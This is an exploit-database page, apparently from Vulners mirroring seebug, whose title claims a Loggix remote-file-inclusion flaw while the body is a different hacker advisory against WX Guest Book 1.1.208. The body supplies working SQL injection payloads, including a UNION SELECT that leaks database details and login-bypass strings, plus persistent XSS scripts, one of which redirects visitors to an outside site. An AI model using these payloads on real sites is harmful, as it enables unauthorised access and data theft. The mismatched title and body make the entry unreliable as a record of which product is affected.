Lucene search
K

Loggix Project <= 9.4.5 Multiple Remote File Inclusion

🗓️ 15 Dec 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 17 Views

Loggix Project <= 9.4.5 Multiple Remote File Inclusion. Product vulnerable to SQL injection and persistent XSS

Code

                                                ###########################################
#	WX Guest Book 1.1.208 Vulns	  #
#	By xxHackerXzX hacker from nepal	  #
#	[email protected]	  #
###########################################

Product name: WX Guestbook 1.1.208
Product vendor: http://www.ekin0x.com/r57.txt

This product suffers from multiple SQLi and persistent XSS vuln.

##############  SQL Search Vuln  ###############

The search parameters/queries we submit to the search.php are unsanitized and hence \
this can be compromised to SQLinject the server.

SQL query:
$signs = DB_Execute(&quot;SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%&quot; . $QUERY . \
&quot;%') ORDER BY `code` DESC&quot;);

The $QUERY is what we submit through search box so injecting this will sql inject the \
server. The following is the sample sql injection example.


Sample search string: test%') UNION ALL SELECT \
1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/*

##############  SQL login bypass  ###############
The username and password fields are unsanitized and hence we can bypass the login \
systems.

Username: admin'))/*
Password: learn3r  [or whatever]

Or

Username: ')) or 1=1/*
Password: learn3r  [or whatever]

##############  Persistent XSS Vulns  ##############

In the name field (I suppose as I don't understand arabic), you can inject XSS...
&lt;script&gt;alert(String.fromCharCode(97));&lt;/script&gt;
&lt;script&gt;location.replace(&quot;http://www.ekin0x.com&quot;)&lt;/script&gt;
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Dec 2009 00:00Current
7.1High risk
Vulners AI Score7.1
17